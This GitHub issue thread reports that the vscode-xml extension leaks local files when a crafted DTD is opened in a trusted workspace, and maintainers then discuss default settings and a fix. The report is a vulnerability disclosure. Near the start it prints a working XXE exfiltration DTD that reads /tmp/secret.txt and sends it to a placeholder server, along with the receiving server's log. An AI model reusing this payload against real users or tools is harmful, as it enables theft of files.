Improve DTD/XSD security with regard to remote resources

[m-1tZ]

Issue

While testing for an XXE vulnerability in an application, I noticed a strange behavior from my VSCode. I could trace this back to your VSCode extension (XML Language Support by Red Hat) which executes my payload.dtd when opened in trusted mode or within a trusted project, and leaked my own files to my web server. The DTD payload can be seen in the following:

<!ENTITY % file SYSTEM "file:///tmp/secret.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://<server>:8080/dtd.xml?%file;'>">
%eval;
%exfiltrate;

Execution

The file /tmp/secret.txt contains sensitive information and represents an arbitrary file on the filesystem of the victim. Upon the opened DTD file, the VSCode XML extension executes the payload and the destination server receives requests of the file content, which can be seen down below:

$ ~/httpserver % python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
<ip>- - [01/Mar/2022 17:24:46] code 404, message File not found
<ip>- - [01/Mar/2022 17:24:46] "GET /dtd.xml?SECRETTEXT HTTP/1.1" 404 -

Impact

Any *.dtd payload that is opened in a trusted VSCode project, will leak arbitrary files to an remote attacker and thus poses a major security problem. There are several ways distributing the DTD file to an victim (e.g. via a merge request, as an external file via a communication channel, via copy and paste platforms like StackOverflow,...).

[angelozerr]

At first which vesion of vscode xml are you using?

We fixed several xxe issues in 1.9.1.

If I understand correctly you are not in unstruted workspace context. So you could have some xxe issues. If you are in unstrusted it should never load your dtd from system and external entities.

In trusted workspace it should download only dtd in system but not from external entities except if you have set the resolveexternalentities setting to true.

[fbricon]

I understand the problem, but the keyword here is "trusted". You already trust the workspace to behave properly. Do you expect another level of trust to prevent remote queries to be performed? (which you can disable with by setting the "xml.downloadExternalResources.enabled" preference to "false")

[m-1tZ]

I'm running the latest version of this extension, which means v0.19.1. I totally agree with you @fbricon and the "trusted" keyword here, but a project can be classified as trustworthy quite quickly. Since there is an option "xml.downloadExternalResources.enabled" to turn this behavior off, should it not be turned off by default? An opt-in approach seems for me the better approach for such major security problem.

[angelozerr]

Turning by default "xml.downloadExternalResources.enabled` means that you will loose all fetaures based on XSD/DTD (XML completion based on XSD/DTD, XML validation based on XSD/DTD, etc), in other words you will benefit with few features like XML syntax validation.

Your case is about external entities which shoule be managed with xml.validation.resolveExternalEntities which is set to false by default in untrusted/trusted context. See https://github.com/redhat-developer/vscode-xml/blob/master/docs/Validation.md#resolve-external-entities

My question is if you set xml.validation.resolveExternalEntities to false, is your server is called? It should not I think.

[m-1tZ]

My server is still called no matter if the xml.validation.resolveExternalEntities is false or true @angelozerr . The only way my server is not called is with xml.downloadExternalResources.enabled set to false. Nevertheless, I did not adjust the settings, which means this file read is possible by default, no matter what settings were set here.

[angelozerr]

Thanks for your feedback. I need to understand why url is called.

I wonder if the file is downloaded in lemminx cache or if this call is just to check the existing of the url.

[angelozerr]

@m-1tZ I work on this issue, see eclipse/lemminx#1183 (comment)